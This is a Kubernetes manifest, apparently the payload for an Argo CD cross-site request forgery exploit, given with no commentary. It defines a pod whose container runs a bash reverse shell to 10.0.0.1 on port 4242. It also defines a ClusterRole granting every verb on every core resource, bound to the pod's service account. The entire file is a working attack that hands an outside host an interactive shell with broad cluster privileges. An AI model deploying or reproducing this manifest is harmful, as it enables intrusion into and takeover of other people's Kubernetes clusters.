apiVersion: v1
kind: ServiceAccount
metadata:
  name: argocd-csrf-sa
---
apiVersion: v1
kind: Pod
metadata:
  name: argocd-csrf-pod
spec:
  serviceAccountName: argocd-csrf-sa
  containers:
  - name: ubuntu
    image: ubuntu:latest
    command: ["bash", "-c", "bash -i >& /dev/tcp/10.0.0.1/4242 0>&1"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: argocd-csrf-role
rules:
- apiGroups: [""]
  resources: ["*"]
  verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: argocd-csrf-rolebinding
subjects:
- kind: ServiceAccount
  name: argocd-csrf-sa
  namespace: default
roleRef:
  kind: ClusterRole
  name: argocd-csrf-role
  apiGroup: rbac.authorization.k8s.io